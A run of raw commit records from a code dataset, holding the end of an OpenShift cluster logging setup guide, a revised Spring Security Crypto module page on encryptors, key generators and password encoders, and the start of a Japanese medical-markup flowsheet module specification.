logStore:\n type: \"elasticsearch\"\n elasticsearch:\n nodeCount: 3\n storage:\n storageClassName: \"gp2\"\n size: \"200Gi\"\n redundancyPolicy: \"SingleRedundancy\"\n nodeSelector:\n node-role.kubernetes.io\/worker: \"\"\n resources:\n requests:\n memory: 8G\n visualization:\n type: \"kibana\"\n kibana:\n replicas: 1\n nodeSelector:\n node-role.kubernetes.io\/worker: \"\"\n curation:\n type: \"curator\"\n curator:\n schedule: \"15 * * * *\"\n nodeSelector:\n node-role.kubernetes.io\/worker: \"\"\n collection:\n logs:\n type: \"fluentd\"\n fluentd: {}\n nodeSelector:\n node-role.kubernetes.io\/worker: \"\"\n----\n\n.. Click *Create* to deploy the logging instance, which creates the Cluster\nLogging and Elasticsearch Custom Resources.\n\n. Verify that the Pods for the Cluster Logging instance deployed:\n\n.. Switch to the *Workloads* \u2192 *Pods* page.\n\n.. Select the *openshift-logging* project.\n+\nYou should see several pods for cluster logging, Elasticsearch, Fluentd, and Kibana similar to the following list:\n+\n* cluster-logging-operator-cb795f8dc-xkckc\n* elasticsearch-cdm-b3nqzchd-1-5c6797-67kfz\n* elasticsearch-cdm-b3nqzchd-2-6657f4-wtprv\n* elasticsearch-cdm-b3nqzchd-3-588c65-clg7g\n* fluentd-2c7dg\n* fluentd-9z7kk\n* fluentd-br7r2\n* fluentd-fn2sb\n* fluentd-pb2f8\n* fluentd-zqgqx\n* kibana-7fb4fd4cc9-bvt4p\n\n. 
Access the Cluster Logging interface, *Kibana*, from the *Monitoring* \u2192\n*Logging* page of the {product-title} web console.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"acda921fe98abbcccd9b957096c7268428418ba9","subject":"Update PasswordEncoder declaration","message":"Update PasswordEncoder declaration\n\nCloses gh-10910\n","repos":"spring-projects\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security","old_file":"docs\/modules\/ROOT\/pages\/features\/integrations\/cryptography.adoc","new_file":"docs\/modules\/ROOT\/pages\/features\/integrations\/cryptography.adoc","new_contents":"[[crypto]]\n= Spring Security Crypto Module\n\n[[spring-security-crypto-introduction]]\nThe Spring Security Crypto module provides support for symmetric encryption, key generation, and password encoding.\nThe code is distributed as part of the core module but has no dependencies on any other Spring Security (or Spring) code.\n\n\n[[spring-security-crypto-encryption]]\n== Encryptors\nThe {security-api-url}org\/springframework\/security\/crypto\/encrypt\/Encryptors.html[`Encryptors`] class provides factory methods for constructing symmetric encryptors.\nThis class lets you create {security-api-url}org\/springframework\/security\/crypto\/encrypt\/BytesEncryptor.html[`BytesEncryptor`] instances to encrypt data in raw `byte[]` form.\nYou can also construct {security-api-url}org\/springframework\/security\/crypto\/encrypt\/TextEncryptor.html[TextEncryptor] instances to encrypt text strings.\nEncryptors are thread-safe.\n\n[NOTE]\n====\nBoth `BytesEncryptor` and `TextEncryptor` are interfaces. 
`BytesEncryptor` has multiple implementations.\n====\n\n[[spring-security-crypto-encryption-bytes]]\n=== BytesEncryptor\nYou can use the `Encryptors.stronger` factory method to construct a `BytesEncryptor`:\n\n.BytesEncryptor\n====\n.Java\n[source,java,role=\"primary\"]\n----\nEncryptors.stronger(\"password\", \"salt\");\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nEncryptors.stronger(\"password\", \"salt\")\n----\n====\n\nThe `stronger` encryption method creates an encryptor by using 256-bit AES encryption with\nGalois Counter Mode (GCM).\nIt derives the secret key by using PKCS #5's PBKDF2 (Password-Based Key Derivation Function #2).\nThis method requires Java 6.\nThe password used to generate the `SecretKey` should be kept in a secure place and should not be shared.\nThe salt is used to prevent dictionary attacks against the key in the event that your encrypted data is compromised.\nA 16-byte random initialization vector is also applied so that each encrypted message is unique.\n\nThe provided salt should be in hex-encoded String form, be random, and be at least 8 bytes in length.\nYou can generate such a salt by using a `KeyGenerator`:\n\n.Generating a key\n====\n.Java\n[source,java,role=\"primary\"]\n----\nString salt = KeyGenerators.string().generateKey(); \/\/ generates a random 8-byte salt that is then hex-encoded\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nval salt = KeyGenerators.string().generateKey() \/\/ generates a random 8-byte salt that is then hex-encoded\n----\n====\n\nYou can also use the `standard` encryption method, which is 256-bit AES in Cipher Block Chaining (CBC) Mode.\nThis mode is not https:\/\/en.wikipedia.org\/wiki\/Authenticated_encryption[authenticated] and does not provide any\nguarantees about the authenticity of the data.\nFor a more secure alternative, use `Encryptors.stronger`.\n\n[[spring-security-crypto-encryption-text]]\n=== TextEncryptor\nYou can use the `Encryptors.text` factory method to construct a standard TextEncryptor:\n\n.TextEncryptor\n====\n.Java\n[source,java,role=\"primary\"]\n----\nEncryptors.text(\"password\", \"salt\");\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nEncryptors.text(\"password\", \"salt\")\n----\n====\n\nA `TextEncryptor` uses a standard `BytesEncryptor` to encrypt text data.\nEncrypted results are returned as hex-encoded strings for easy storage on the filesystem or in a database.\n\nYou can use the `Encryptors.queryableText` factory method to construct a \"`queryable`\" `TextEncryptor`:\n\n.Queryable TextEncryptor\n====\n.Java\n[source,java,role=\"primary\"]\n----\nEncryptors.queryableText(\"password\", \"salt\");\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nEncryptors.queryableText(\"password\", \"salt\")\n----\n====\n\nThe difference between a queryable `TextEncryptor` and a standard `TextEncryptor` has to do with initialization vector (IV) handling.\nThe IV used in a queryable `TextEncryptor.encrypt` operation is shared, or constant, and is not randomly generated.\nThis means the same text encrypted multiple times always produces the same encryption result.\nThis is less secure but necessary for encrypted data that needs to be queried against.\nAn example of queryable encrypted text would be an OAuth `apiKey`.\n\n[[spring-security-crypto-keygenerators]]\n== Key Generators\nThe {security-api-url}org\/springframework\/security\/crypto\/keygen\/KeyGenerators.html[`KeyGenerators`] class provides a number of convenience factory methods for constructing different 
types of key generators.\nBy using this class, you can create a {security-api-url}org\/springframework\/security\/crypto\/keygen\/BytesKeyGenerator.html[`BytesKeyGenerator`] to generate `byte[]` keys.\nYou can also construct a {security-api-url}org\/springframework\/security\/crypto\/keygen\/StringKeyGenerator.html[`StringKeyGenerator`] to generate string keys.\n`KeyGenerators` is a thread-safe class.\n\n=== BytesKeyGenerator\nYou can use the `KeyGenerators.secureRandom` factory methods to generate a `BytesKeyGenerator` backed by a `SecureRandom` instance:\n\n.BytesKeyGenerator\n====\n.Java\n[source,java,role=\"primary\"]\n----\nBytesKeyGenerator generator = KeyGenerators.secureRandom();\nbyte[] key = generator.generateKey();\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nval generator = KeyGenerators.secureRandom()\nval key = generator.generateKey()\n----\n====\n\nThe default key length is 8 bytes.\nA `KeyGenerators.secureRandom` variant provides control over the key length:\n\n.KeyGenerators.secureRandom\n====\n.Java\n[source,java,role=\"primary\"]\n----\nKeyGenerators.secureRandom(16);\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nKeyGenerators.secureRandom(16)\n----\n====\n\nUse the `KeyGenerators.shared` factory method to construct a `BytesKeyGenerator` that always returns the same key on every invocation:\n\n.KeyGenerators.shared\n====\n.Java\n[source,java,role=\"primary\"]\n----\nKeyGenerators.shared(16);\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nKeyGenerators.shared(16)\n----\n====\n\n=== StringKeyGenerator\nYou can use the `KeyGenerators.string` factory method to construct an 8-byte, `SecureRandom` `KeyGenerator` that hex-encodes each key as a `String`:\n\n.StringKeyGenerator\n====\n.Java\n[source,java,role=\"primary\"]\n----\nKeyGenerators.string();\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nKeyGenerators.string()\n----\n====\n\n[[spring-security-crypto-passwordencoders]]\n== Password Encoding\nThe password package of the `spring-security-crypto` module provides support for encoding passwords.\n`PasswordEncoder` is the central service interface and has the following signature:\n\n====\n[source,java]\n----\npublic interface PasswordEncoder {\n\tString encode(CharSequence rawPassword);\n\n\tboolean matches(CharSequence rawPassword, String encodedPassword);\n\n\tdefault boolean upgradeEncoding(String encodedPassword) {\n\t\treturn false;\n\t}\n}\n----\n====\n\nThe `matches` method returns true if the `rawPassword`, once encoded, equals the `encodedPassword`.\nThis method is designed to support password-based authentication schemes.\n\nThe `BCryptPasswordEncoder` implementation uses the widely supported \"`bcrypt`\" algorithm to hash the passwords.\nBcrypt uses a random 16-byte salt value and is a deliberately slow algorithm, to hinder password crackers.\nYou can tune the amount of work it does by using the `strength` parameter, which takes a value from 4 to 31.\nThe higher the value, the more work has to be done to calculate the hash.\nThe default value is `10`.\nYou can change this value in your deployed system without affecting existing passwords, as the value is also stored in the encoded hash.\nThe following example uses the `BCryptPasswordEncoder`:\n\n.BCryptPasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n\n\/\/ Create an encoder with strength 16\nBCryptPasswordEncoder encoder = new BCryptPasswordEncoder(16);\nString result = 
encoder.encode(\"myPassword\");\nassertTrue(encoder.matches(\"myPassword\", result));\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n\n\/\/ Create an encoder with strength 16\nval encoder = BCryptPasswordEncoder(16)\nval result: String = encoder.encode(\"myPassword\")\nassertTrue(encoder.matches(\"myPassword\", result))\n----\n====\n\nThe `Pbkdf2PasswordEncoder` implementation uses PBKDF2 algorithm to hash the passwords.\nTo defeat password cracking, PBKDF2 is a deliberately slow algorithm and should be tuned to take about .5 seconds to verify a password on your system.\nThe following system uses the `Pbkdf2PasswordEncoder`:\n\n\n.Pbkdf2PasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n\/\/ Create an encoder with all the defaults\nPbkdf2PasswordEncoder encoder = new Pbkdf2PasswordEncoder();\nString result = encoder.encode(\"myPassword\");\nassertTrue(encoder.matches(\"myPassword\", result));\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n\/\/ Create an encoder with all the defaults\nval encoder = Pbkdf2PasswordEncoder()\nval result: String = encoder.encode(\"myPassword\")\nassertTrue(encoder.matches(\"myPassword\", result))\n----\n====\n","old_contents":"[[crypto]]\n= Spring Security Crypto Module\n\n[[spring-security-crypto-introduction]]\nThe Spring Security Crypto module provides support for symmetric encryption, key generation, and password encoding.\nThe code is distributed as part of the core module but has no dependencies on any other Spring Security (or Spring) code.\n\n\n[[spring-security-crypto-encryption]]\n== Encryptors\nThe {security-api-url}org\/springframework\/security\/crypto\/encrypt\/Encryptors.html[`Encryptors`] class provides factory methods for constructing symmetric encryptors.\nThis class lets you create {security-api-url}org\/springframework\/security\/crypto\/encrypt\/BytesEncryptor.html[`BytesEncryptor`] instances to encrypt data in raw `byte[]` form.\nYou can also construct {security-api-url}org\/springframework\/security\/crypto\/encrypt\/TextEncryptor.html[TextEncryptor] instances to encrypt text strings.\nEncryptors are thread-safe.\n\n[NOTE]\n====\nBoth `BytesEncryptor` and `TextEncryptor` are interfaces. 
`BytesEncryptor` has multiple implementations.\n====\n\n[[spring-security-crypto-encryption-bytes]]\n=== BytesEncryptor\nYou can use the `Encryptors.stronger` factory method to construct a `BytesEncryptor`:\n\n.BytesEncryptor\n====\n.Java\n[source,java,role=\"primary\"]\n----\nEncryptors.stronger(\"password\", \"salt\");\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nEncryptors.stronger(\"password\", \"salt\")\n----\n====\n\nThe `stronger` encryption method creates an encryptor by using 256-bit AES encryption with\nGalois Counter Mode (GCM).\nIt derives the secret key by using PKCS #5's PBKDF2 (Password-Based Key Derivation Function #2).\nThis method requires Java 6.\nThe password used to generate the `SecretKey` should be kept in a secure place and should not be shared.\nThe salt is used to prevent dictionary attacks against the key in the event that your encrypted data is compromised.\nA 16-byte random initialization vector is also applied so that each encrypted message is unique.\n\nThe provided salt should be in hex-encoded String form, be random, and be at least 8 bytes in length.\nYou can generate such a salt by using a `KeyGenerator`:\n\n.Generating a key\n====\n.Java\n[source,java,role=\"primary\"]\n----\nString salt = KeyGenerators.string().generateKey(); \/\/ generates a random 8-byte salt that is then hex-encoded\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nval salt = KeyGenerators.string().generateKey() \/\/ generates a random 8-byte salt that is then hex-encoded\n----\n====\n\nYou can also use the `standard` encryption method, which is 256-bit AES in Cipher Block Chaining (CBC) Mode.\nThis mode is not https:\/\/en.wikipedia.org\/wiki\/Authenticated_encryption[authenticated] and does not provide any\nguarantees about the authenticity of the data.\nFor a more secure alternative, use `Encryptors.stronger`.\n\n[[spring-security-crypto-encryption-text]]\n=== TextEncryptor\nYou can use the `Encryptors.text` factory method to construct a standard TextEncryptor:\n\n.TextEncryptor\n====\n.Java\n[source,java,role=\"primary\"]\n----\nEncryptors.text(\"password\", \"salt\");\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nEncryptors.text(\"password\", \"salt\")\n----\n====\n\nA `TextEncryptor` uses a standard `BytesEncryptor` to encrypt text data.\nEncrypted results are returned as hex-encoded strings for easy storage on the filesystem or in a database.\n\nYou can use the `Encryptors.queryableText` factory method to construct a \"`queryable`\" `TextEncryptor`:\n\n.Queryable TextEncryptor\n====\n.Java\n[source,java,role=\"primary\"]\n----\nEncryptors.queryableText(\"password\", \"salt\");\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nEncryptors.queryableText(\"password\", \"salt\")\n----\n====\n\nThe difference between a queryable `TextEncryptor` and a standard `TextEncryptor` has to do with initialization vector (IV) handling.\nThe IV used in a queryable `TextEncryptor.encrypt` operation is shared, or constant, and is not randomly generated.\nThis means the same text encrypted multiple times always produces the same encryption result.\nThis is less secure but necessary for encrypted data that needs to be queried against.\nAn example of queryable encrypted text would be an OAuth `apiKey`.\n\n[[spring-security-crypto-keygenerators]]\n== Key Generators\nThe {security-api-url}org\/springframework\/security\/crypto\/keygen\/KeyGenerators.html[`KeyGenerators`] class provides a number of convenience factory methods for constructing different 
types of key generators.\nBy using this class, you can create a {security-api-url}org\/springframework\/security\/crypto\/keygen\/BytesKeyGenerator.html[`BytesKeyGenerator`] to generate `byte[]` keys.\nYou can also construct a {security-api-url}org\/springframework\/security\/crypto\/keygen\/StringKeyGenerator.html`[StringKeyGenerator]` to generate string keys.\n`KeyGenerators` is a thread-safe class.\n\n=== BytesKeyGenerator\nYou can use the `KeyGenerators.secureRandom` factory methods to generate a `BytesKeyGenerator` backed by a `SecureRandom` instance:\n\n.BytesKeyGenerator\n====\n.Java\n[source,java,role=\"primary\"]\n----\nBytesKeyGenerator generator = KeyGenerators.secureRandom();\nbyte[] key = generator.generateKey();\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nval generator = KeyGenerators.secureRandom()\nval key = generator.generateKey()\n----\n====\n\nThe default key length is 8 bytes.\nA `KeyGenerators.secureRandom` variant provides control over the key length:\n\n.KeyGenerators.secureRandom\n====\n.Java\n[source,java,role=\"primary\"]\n----\nKeyGenerators.secureRandom(16);\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nKeyGenerators.secureRandom(16)\n----\n====\n\nUse the `KeyGenerators.shared` factory method to construct a BytesKeyGenerator that always returns the same key on every invocation:\n\n.KeyGenerators.shared\n====\n.Java\n[source,java,role=\"primary\"]\n----\nKeyGenerators.shared(16);\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nKeyGenerators.shared(16)\n----\n====\n\n=== StringKeyGenerator\nYou can use the `KeyGenerators.string` factory method to construct an 8-byte, `SecureRandom` `KeyGenerator` that hex-encodes each key as a `String`:\n\n.StringKeyGenerator\n====\n.Java\n[source,java,role=\"primary\"]\n----\nKeyGenerators.string();\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nKeyGenerators.string()\n----\n====\n\n[[spring-security-crypto-passwordencoders]]\n== Password Encoding\nThe password package of the `spring-security-crypto` module provides support for encoding passwords.\n`PasswordEncoder` is the central service interface and has the following signature:\n\n====\n[source,java]\n----\npublic interface PasswordEncoder {\n\nString encode(String rawPassword);\n\nboolean matches(String rawPassword, String encodedPassword);\n}\n----\n====\n\nThe `matches` method returns true if the `rawPassword`, once encoded, equals the `encodedPassword`.\nThis method is designed to support password-based authentication schemes.\n\nThe `BCryptPasswordEncoder` implementation uses the widely supported \"`bcrypt`\" algorithm to hash the passwords.\nBcrypt uses a random 16-byte salt value and is a deliberately slow algorithm, to hinder password crackers.\nYou can tune the amount of work it does by using the `strength` parameter, which takes a value from 4 to 31.\nThe higher the value, the more work has to be done to calculate the hash.\nThe default value is `10`.\nYou can change this value in your deployed system without affecting existing passwords, as the value is also stored in the encoded hash.\nThe following example uses the `BCryptPasswordEncoder`:\n\n.BCryptPasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n\n\/\/ Create an encoder with strength 16\nBCryptPasswordEncoder encoder = new BCryptPasswordEncoder(16);\nString result = encoder.encode(\"myPassword\");\nassertTrue(encoder.matches(\"myPassword\", result));\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n\n\/\/ Create an encoder with 
strength 16\nval encoder = BCryptPasswordEncoder(16)\nval result: String = encoder.encode(\"myPassword\")\nassertTrue(encoder.matches(\"myPassword\", result))\n----\n====\n\nThe `Pbkdf2PasswordEncoder` implementation uses PBKDF2 algorithm to hash the passwords.\nTo defeat password cracking, PBKDF2 is a deliberately slow algorithm and should be tuned to take about .5 seconds to verify a password on your system.\nThe following system uses the `Pbkdf2PasswordEncoder`:\n\n\n.Pbkdf2PasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n\/\/ Create an encoder with all the defaults\nPbkdf2PasswordEncoder encoder = new Pbkdf2PasswordEncoder();\nString result = encoder.encode(\"myPassword\");\nassertTrue(encoder.matches(\"myPassword\", result));\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n\/\/ Create an encoder with all the defaults\nval encoder = Pbkdf2PasswordEncoder()\nval result: String = encoder.encode(\"myPassword\")\nassertTrue(encoder.matches(\"myPassword\", result))\n----\n====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"94e170c1bd7e9d31f70f5504e96b92a7a922c3d8","subject":"fixed #89","message":"fixed #89\n","repos":"skoba\/mml,skoba\/mml","old_file":"doc\/MML4\/flowsheet.adoc","new_file":"doc\/MML4\/flowsheet.adoc","new_contents":":Author: Shinji KOBAYASHI\n:Email: skoba@moss.gr.jp\n:toc: right\n:toclevels: 2\n:pagenums:\n:numberd:\n:sectnums:\n:imagesdir: .\/figures\n:linkcss:\n\n=== \u4f53\u6e29\u8868\u30e2\u30b8\u30e5\u30fc\u30eb\n==== \u76ee\u7684\u3068\u5bfe\u8c61\n\u65e5\u3005\u306e\u4ecb\u8b77\u3084\u770b\u8b77\u3067\u8a18\u9332\u3055\u308c\u308b\u4f53\u6e29\u8868\u3092\u8a18\u9332\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u308b\u3002\n\n\u3053\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u306b\u304a\u3044\u3066\u306f\u3001\u30d0\u30a4\u30bf\u30eb\u30b5\u30a4\u30f3\u30e2\u30b8\u30e5\u30fc\u30eb\u3068\u3042\u308f\u305b\u3066\u3001\u98df\u4e8b\u6442\u53d6\u91cf\u3001\u6392\u6cc4\u306b\u3064\u3044\u3066\u306e\u60c5\u5831\u3092\u6271\u3063\u3066\u3044\u304f\u3002\u60f3\u5b9a\u3055\u308c\u308b\u30e6\u30fc\u30b9\u30b1\u30fc\u30b9\u306f\u4f53\u6e29\u8868\u306b\u8a18\u8f09\u3055\u308c\u308b\u5404\u7a2e\u60c5\u5831\u3067\u3042\u308b\u3002\n\n\u56f3\u306b\u793a\u3059\u3088\u3046\u306b\u3001\u30d0\u30a4\u30bf\u30eb\u30b5\u30a4\u30f3\u3084\u6442\u98df\u60c5\u5831\u3001\u6392\u6cc4\u306b\u95a2\u3059\u308b\u60c5\u5831\u306f\u7e70\u308a\u8fd4\u3057\u8a18\u9332\u3055\u308c\u308b\u3002\n\n==== namespace\u5ba3\u8a00\n\u3053\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u306enamespace\u306f\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u5ba3\u8a00\u3059\u308b\u3002\n[source, xml]\n xmlns:mmlFs=\"http:\/\/www.medxml.net\/MML\/v4\/ContentModule\/FlowSheet\/1.0\"\n\n==== \u6587\u66f8\u30d8\u30c3\u30c0\u30fc\u60c5\u5831 (docInfo) \u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u500b\u5225\u4ed5\u69d8\n===== docInfo\n\u5c5e\u6027 contentModuleType \u306b MML0005 \u30c6\u30fc\u30d6\u30eb\u3088\u308a\u300cflowsheet\u300d\u3092\u5165\u529b\u3059\u308b\u3053\u3068\uff0e\n\n===== 
title\n\u3053\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u306f\u75c5\u68df\u3042\u308b\u3044\u306f\u4ecb\u8b77\u65bd\u8a2d\u306a\u3069\u3067\u65e5\u3005\u8a18\u9332\u3055\u308c\u308b\u4f53\u6e29\u8868\u3092\u4e3b\u306a\u30e6\u30fc\u30b9\u30b1\u30fc\u30b9\u3068\u8003\u3048\u3066\u3044\u308b\u3002\u3057\u305f\u304c\u3063\u3066\u3001\u30ec\u30dd\u30fc\u30c8\u30bf\u30a4\u30c8\u30eb\u3068\u3057\u3066\u306f\u300c\u4f53\u6e29\u8868\u300d\u3067\u3042\u308b\u3053\u3068\u3092\u524d\u63d0\u3068\u3059\u308b\u304c\u3001\u75c5\u68df\u3067\u6163\u7528\u7684\u306b\u5229\u7528\u3055\u308c\u308b\u300c\u71b1\u578b\u8868\u300d\u300c\u4f53\u6e29\u8868\u300d\u3084\u300c\u6e29\u5ea6\u677f\u300d\u306a\u3069\u304c\u3001\u30bf\u30a4\u30c8\u30eb\u3068\u3057\u3066\u4f7f\u7528\u3055\u308c\u308b\u3053\u3068\u3082\u60f3\u5b9a\u3057\u3066\u3044\u308b\u3002\n\n\u5c5e\u6027\u306e generationPurpose \u306f\uff0cMML0007 \u30c6\u30fc\u30d6\u30eb\u3088\u308a\u300cflowsheet\u300d (\u4f53\u6e29\u8868) \u3068\u5165\u529b\u3059\u308b\u3053\u3068\uff0e\n\n===== confirmDate\n\u30e2\u30b8\u30e5\u30fc\u30eb\u751f\u6210\u65e5\u3067\u3042\u308a\uff0c\u5168\u4f53\u3068\u3057\u3066\u306e\u5831\u544a\u304c\u306a\u3055\u308c\u305f\u6642\u523b\u3092\u793a\u3059\uff0e\n\n===== mmlCi:CreatorInfo\n\u4f53\u6e29\u8868\u30e2\u30b8\u30e5\u30fc\u30eb\u3067\u306f\u3001\u591a\u8077\u7a2e\u306b\u308f\u305f\u308b\u8907\u6570\u306e\u4eba\u9593\u304c\u89b3\u5bdf\u3057\u305f\u60c5\u5831\u304c\u4e00\u3064\u306e\u5831\u544a\u66f8\u306b\u8a18\u8f09\u3055\u308c\u308b\u3053\u3068\u304c\u3042\u308b\u3002\u6700\u7d42\u7684\u306a\u8a18\u8f09\u8005\u3042\u308b\u3044\u306f\u4ee3\u8868\u8005\u304c\u4f5c\u6210\u8005\u60c5\u5831\u3068\u3057\u3066\u8a18\u9332\u3055\u308c\u308b\u3002\n\n.\u30a8\u30ec\u30e1\u30f3\u30c8\u69cb\u9020\u56f3\nimage::mmlfs.png[]\n\n.\u30a8\u30ec\u30e1\u30f3\u30c8\u4e00\u89a7\u8868\n[options=\"header\"]\n|===\n| |Elements|Attribute|Data types|Occurrence|TableId\n|M23.|mmlFs:FlowSheetModule| | | |\n|M23.1.|mmlFs:context| | | |\n|M23.1.1.|mmlFs:facility| |string| |\n| | |mmlFs:facilityCode|string|#REQUIRED|\n| | |mmlFs:facilityCodeId|string|#REQUIRED|MML0027\n|M23.1.2.|mmlFs:department| |string|?|\n| | |mmlFs:depCode|string|#IMPLIED|MML0028\n| | |mmlFs:depCodeId|string|#IMPLIED|\n|M23.1.3.|mmlFs:ward| |string|?|\n| | |mmlFs:wardCode|string|#IMPLIED|\u30e6\u30fc\u30b6\u6307\u5b9a\n| | |mmlFs:wardCodeId|string|#IMPLIED|\n|M23.1.4.|mmlFs:observer| |string|?|\n| | |mmlFs:obsCode|string|#IMPLIED|\u30e6\u30fc\u30b6\u6307\u5b9a\n| | |mmlFs:obsCodeId|string|#IMPLIED|\n|M23.2.|mmlVs:VitalSignModule| | |*|\n|M23.3.|mmlFs:intake| | |*|\n|M23.3.1.|mmlFs:intakeType| |string| |mmlFs01\n|M23.3.2.|mmlFs:intakeVolume| |decimal|?|\n|M23.3.3.|mmlFs:intakeUnit| |string|?|mmlFs02\n|M23.3.4.|mmlFs:intakePathway| |string|?|\n|M23.3.5.|mmlFs:intakeStartTime| |dateTime|?|\n|M23.3.6.|mmlFs:intakeEndTime| |dateTime|?|\n|M23.3.7.|mmlFs:intakeMemo| |string|?|\n|M23.4.|mmlFs:bodilyOutput| | |*|\n|M23.4.1.|mmlFs:boType| |string| |mmlFs03\n|M23.4.2.|mmlFs:boVolume| |decimal|?|\n|M23.4.3.|mmlFs:boUnit| |string|?|mmlFs04\n|M23.4.4.|mmlFs:boStatus| |string|?|\n|M23.4.5.|mmlFs:boColor| |string|?|\n|M23.4.6.|mmlFs:boPathway| |string|?|\n|M23.4.7.|mmlFs:boStartTime| |dateTime|?|\n|M23.4.8.|mmlFs:boEndTime| |dateTime|?|\n|M23.4.9.|mmlFs:boMemo| |string|?|\n|M23.4.10.|mmlFs:boFrequency| | |*|\n|M23.4.10.1.|mmlFs:bofTimes| |decimal|?|\n|M23.4.10.2.|mmlFs:bofPeriodStartTime| |dateTime|?|\n|M23.4.10.3.|mmlFs:bofPeriodEndTime| |dateTime|?|\n|M23.4.10.4.|mmlFs:bofMemo| 
|string|?|\n|M23.5.|mmlFs:fsMemo| |string|?|\n|===\nOccurrence\u306a\u3057\uff1a\u5fc5\u305a1\u56de\u51fa\u73fe\uff0c?\uff1a 0\u56de\u3082\u3057\u304f\u306f1\u56de\u51fa\u73fe\uff0c+\uff1a 1\u56de\u4ee5\u4e0a\u51fa\u73fe\uff0c*\uff1a 0 \u56de\u4ee5\u4e0a\u51fa\u73fe\n\n#REQUIRED:\u5fc5\u9808\u5c5e\u6027\uff0c#IMPLIED:\u7701\u7565\u53ef\u80fd\u5c5e\u6027\n\n==== \u30a8\u30ec\u30e1\u30f3\u30c8\u89e3\u8aac\n===== M23. mmlFs:FlowSheetModule\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u30e2\u30b8\u30e5\u30fc\u30eb\n\n===== M23.1. mmlFs:context\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u304c\u8a18\u9332\u3055\u308c\u305f\u74b0\u5883\u306b\u3064\u3044\u3066\u306e\u60c5\u5831\u3092\u8868\u3059\u89aa\u30a8\u30ec\u30e1\u30f3\u30c8 +\n\u3010\u7701\u7565\u3011\u4e0d\u53ef\n\n===== M23.1.1. mmlFs:facility\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u3092\u8a18\u9332\u3057\u305f\u65bd\u8a2d +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u4e0d\u53ef +\n\u3010\u5c5e\u6027\u3011\n[options=\"header\"]\n|===\n|\u5c5e\u6027\u540d|\u30c7\u30fc\u30bf\u578b|\u7701\u7565|\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb|\u8aac\u660e\n|mmlFs:facilityCode|string|#REQUIRED| |\n|mmlFs:facilityCodeId|string|#REQUIRED|MML0027|\u7528\u3044\u305f\u30b3\u30fc\u30c9\u4f53\u7cfb\u306e\u540d\u79f0\u3092\u8a18\u8f09\n|===\n\n===== M23.1.2. mmlFs:department\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u3092\u8a18\u9332\u3057\u305f\u90e8\u7f72 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u53ef +\n\u3010\u5c5e\u6027\u3011\n[options=\"header\"]\n|===\n|\u5c5e\u6027\u540d|\u30c7\u30fc\u30bf\u578b|\u7701\u7565|\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb|\u8aac\u660e\n|mmlFs:depCode|string|#IMPLIED|MML0028|\n|mmlFs:depCodeId|string|#IMPLIED| | \t\tMML0028\u3068\u5165\u529b\n|===\n\n===== M23.1.3. mmlFs:ward\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u3092\u8a18\u9332\u3057\u305f\u75c5\u68df\u30fb\u5834\u6240 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u53ef +\n\u3010\u5c5e\u6027\u3011\n[options=\"header\"]\n|===\n|\u5c5e\u6027\u540d|\u30c7\u30fc\u30bf\u578b|\u7701\u7565|\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb|\u8aac\u660e\n|mmlFs:wardCode|string|#IMPLIED|\u30e6\u30fc\u30b6\u6307\u5b9a|\n|mmlFs:wardCodeId|string|#IMPLIED| |\u7528\u3044\u305f\u30c6\u30fc\u30d6\u30eb\u540d\u3092\u5165\u529b\n|===\n\n===== M23.1.4. mmlFs:observer\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u60c5\u5831\u306e\u89b3\u5bdf\u8005 